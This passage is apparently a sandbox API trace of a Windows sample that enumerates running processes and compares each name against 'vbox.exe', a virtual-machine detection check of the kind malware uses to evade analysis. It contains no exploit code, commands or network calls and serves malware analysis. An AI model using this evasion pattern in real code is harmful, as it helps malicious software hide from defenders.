0x12ef870 [0122.079] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd448 [0122.079] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0122.079] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd460 [0122.079] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6f0 [0122.079] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd688 [0122.079] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0122.079] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd460 | out: hHeap=0x12c0000) returned 1 [0122.079] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec40 [0122.079] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7e0 [0122.079] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd460 [0122.079] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd460 | out: hHeap=0x12c0000) returned 1 [0122.079] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0122.079] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd688 | out: hHeap=0x12c0000) returned 1 [0122.079] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0122.080] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec40 | out: hHeap=0x12c0000) returned 1 [0122.080] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0122.080] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd448 | out: hHeap=0x12c0000) returned 1 [0122.080] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0122.080] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0122.080] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0122.080] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12feb00 | out: hHeap=0x12c0000) returned 1 [0122.080] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0122.080] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x1300ce8 [0122.080] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0122.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wininit.exe", cchCount1=11, lpString2="vbox.exe", cchCount2=8) returned 3 [0122.081] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0122.081] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef780 | out: hHeap=0x12c0000) returned 1 [0122.081] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300ce8 | out: hHeap=0x12c0000) returned 1 [0122.081] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0122.081] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0122.082] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0122.083] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef750 [0122.083] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0122.083] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0122.083] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee98 [0122.083] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef700 [0122.083] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0122.083] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6f0 [0122.083] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd628 [0122.083] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef840 [0122.083] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd460 [0122.083] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0122.083] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd478 [0122.084] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef710 [0122.084] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd460 | out: hHeap=0x12c0000) returned 1 [0122.084] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12feb00 [0122.084] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef780 [0122.084] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5b0 [0122.084] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5b0 | out: hHeap=0x12c0000) returned 1 [0122.084] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef780 | out: hHeap=0x12c0000) returned 1 [0122.085] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd478 | out: hHeap=0x12c0000) returned 1 [0122.085] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef710 | out: hHeap=0x12c0000) returned 1 [0122.085] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12feb00 | out: hHeap=0x12c0000) returned 1 [0122.085] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0122.085] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd628 | out: hHeap=0x12c0000) returned 1 [0122.085] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0122.085] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0122.085] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0122.085] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee98 | out: hHeap=0x12c0000) returned 1 [0122.085] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef700 | out: hHeap=0x12c0000) returned 1 [0122.085] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x13011f0 [0122.086] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0122.086] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csrss.exe", cchCount1=9, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.086] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0122.086] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0122.086] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13011f0 | out: hHeap=0x12c0000) returned 1 [0122.086] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef750 | out: hHeap=0x12c0000) returned 1 [0122.086] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0122.087] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0122.087] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0122.087] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0122.088] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6f0 [0122.088] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee98 [0122.088] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef840 [0122.088] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0122.088] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef790 [0122.088] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5e0 [0122.088] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0122.088] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd550 [0122.088] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef700 [0122.088] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4a8 [0122.088] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0122.088] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd550 | out: hHeap=0x12c0000) returned 1 [0122.088] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec40 [0122.088] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8b0 [0122.088] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4d8 [0122.088] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0122.088] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12feb00 [0122.089] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4d8 | out: hHeap=0x12c0000) returned 1 [0122.089] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0122.089] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4a8 | out: hHeap=0x12c0000) returned 1 [0122.089] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0122.089] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec40 | out: hHeap=0x12c0000) returned 1 [0122.089] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef700 | out: hHeap=0x12c0000) returned 1 [0122.089] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5e0 | out: hHeap=0x12c0000) returned 1 [0122.089] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0122.089] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0122.089] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef790 | out: hHeap=0x12c0000) returned 1 [0122.089] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee98 | out: hHeap=0x12c0000) returned 1 [0122.089] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0122.089] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="winlogon.exe", cchCount1=12, lpString2="vbox.exe", cchCount2=8) returned 3 [0122.089] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0122.089] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0122.089] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12feb00 | out: hHeap=0x12c0000) returned 1 [0122.089] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0122.089] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0122.093] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0122.093] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0122.093] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0122.093] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef700 [0122.093] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0122.093] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0122.094] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0122.094] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0122.094] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd460 [0122.094] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef710 [0122.094] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd3d0 [0122.094] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0122.094] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd6b8 [0122.094] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7e0 [0122.094] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd3d0 | out: hHeap=0x12c0000) returned 1 [0122.094] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12feb00 [0122.094] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6f0 [0122.094] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5e0 [0122.094] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0122.094] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec90 [0122.095] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5e0 | out: hHeap=0x12c0000) returned 1 [0122.095] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0122.095] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6b8 | out: hHeap=0x12c0000) returned 1 [0122.095] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0122.095] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12feb00 | out: hHeap=0x12c0000) returned 1 [0122.095] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0122.095] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd460 | out: hHeap=0x12c0000) returned 1 [0122.095] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef710 | out: hHeap=0x12c0000) returned 1 [0122.095] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0122.095] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0122.095] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0122.095] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0122.095] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="services.exe", cchCount1=12, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.095] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0122.096] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef700 | out: hHeap=0x12c0000) returned 1 [0122.096] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec90 | out: hHeap=0x12c0000) returned 1 [0122.096] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0122.096] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0122.098] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0122.098] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0122.098] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0122.098] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0122.098] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0122.098] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0122.098] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0122.098] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0122.099] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd568 [0122.099] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0122.099] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd478 [0122.099] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0122.099] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd448 [0122.099] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0122.099] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd478 | out: hHeap=0x12c0000) returned 1 [0122.099] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee98 [0122.099] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef760 [0122.100] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4a8 [0122.100] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4a8 | out: hHeap=0x12c0000) returned 1 [0122.100] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef760 | out: hHeap=0x12c0000) returned 1 [0122.100] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd448 | out: hHeap=0x12c0000) returned 1 [0122.100] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0122.115] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee98 | out: hHeap=0x12c0000) returned 1 [0122.115] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0122.115] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd568 | out: hHeap=0x12c0000) returned 1 [0122.116] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0122.116] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0122.116] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0122.116] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0122.116] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0122.116] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x13011f0 [0122.116] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0122.116] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lsass.exe", cchCount1=9, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.116] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0122.117] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0122.117] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13011f0 | out: hHeap=0x12c0000) returned 1 [0122.117] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0122.117] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0122.119] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0122.119] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6f0 [0122.119] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0122.119] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef700 [0122.119] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee98 [0122.119] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0122.119] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0122.119] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0122.120] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd6a0 [0122.120] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef760 [0122.120] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd640 [0122.120] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0122.120] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4f0 [0122.120] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0122.120] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd640 | out: hHeap=0x12c0000) returned 1 [0122.120] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec40 [0122.120] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0122.120] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd538 [0122.121] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd538 | out: hHeap=0x12c0000) returned 1 [0122.121] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0122.121] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4f0 | out: hHeap=0x12c0000) returned 1 [0122.121] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0122.121] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec40 | out: hHeap=0x12c0000) returned 1 [0122.121] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0122.121] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6a0 | out: hHeap=0x12c0000) returned 1 [0122.123] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef760 | out: hHeap=0x12c0000) returned 1 [0122.123] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0122.123] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0122.123] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee98 | out: hHeap=0x12c0000) returned 1 [0122.123] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0122.123] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x1300e00 [0122.123] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0122.124] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="svchost.exe", cchCount1=11, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.124] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0122.124] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef700 | out: hHeap=0x12c0000) returned 1 [0122.124] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300e00 | out: hHeap=0x12c0000) returned 1 [0122.124] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0122.124] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0122.126] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0122.126] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0122.126] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0122.126] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef890 [0122.126] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec40 [0122.126] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6f0 [0122.126] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0122.126] 